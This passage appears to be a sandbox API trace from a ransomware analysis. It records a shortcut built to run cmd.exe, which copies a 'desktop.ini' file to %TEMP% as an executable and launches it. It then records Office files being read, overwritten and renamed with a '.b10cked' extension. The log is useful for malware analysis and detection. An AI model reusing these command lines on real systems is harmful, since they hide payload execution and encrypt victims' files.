[7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0152.675] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0152.675] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0152.675] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0152.676] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"1036\" & type \"1036\\desktop.ini\" > \"%TEMP%\\V5R6hfJs.exe\" && \"%TEMP%\\V5R6hfJs.exe\"") returned 0x0 [0152.676] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0152.676] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, 
pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0152.676] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0152.676] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036.lnk", fRemember=0) returned 0x0 [0152.684] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0152.684] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0152.684] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0152.684] CoUninitialize () [0152.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.684] ReleaseMutex (hMutex=0xf8) returned 1 [0152.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.684] ReleaseMutex (hMutex=0xf8) returned 1 [0152.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.684] ReleaseMutex (hMutex=0xf8) returned 1 [0152.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.685] ReleaseMutex (hMutex=0xf8) returned 1 [0152.685] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.796] 
QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20958541895) returned 1 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.796] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xbf60 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.797] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xbf60 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.797] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xba78 [0152.797] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0152.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0152.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0152.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xbf60 [0152.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0152.832] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0152.832] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0152.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xbf60 [0152.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0152.833] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0152.833] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5faf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5faf, lpOverlapped=0x0) returned 1 [0152.850] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0152.850] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5faf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5faf, lpOverlapped=0x0) returned 1 [0152.850] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24495, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5fb1 [0152.850] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5faf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5faf, lpOverlapped=0x0) returned 1 [0152.851] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24495, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5fb1 [0152.851] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5faf, lpNumberOfBytesWritten=0x12ec1c, 
lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5faf, lpOverlapped=0x0) returned 1 [0152.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0152.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GRINTL32.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GRINTL32.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0152.855] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xbf60 [0152.855] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0152.855] CloseHandle (hObject=0x114) returned 1 [0152.857] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX") returned 0x3c [0152.858] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\") returned 0x30 [0152.858] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, 
dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xe50, dwThreadId=0xec4)) returned 1 [0152.864] CloseHandle (hObject=0x110) returned 1 [0152.864] CloseHandle (hObject=0x114) returned 1 [0152.864] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0152.864] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0152.864] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 2 [0152.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.864] ReleaseMutex (hMutex=0xf8) returned 1 [0152.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.864] ReleaseMutex (hMutex=0xf8) returned 1 [0152.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.864] ReleaseMutex (hMutex=0xf8) returned 1 [0152.864] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0152.865] ReleaseMutex 
(hMutex=0xf8) returned 1 [0152.865] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0152.865] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.865] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=20965481156) returned 1 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | 
out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x3d960 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.866] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3d960 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0152.867] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3d478 [0152.867] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, 
lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3d960 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3d960 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0152.986] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0152.986] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0152.992] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0152.994] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xcaf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xcaf, lpOverlapped=0x0) returned 1 [0152.998] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0152.998] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0152.998] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0xf000, 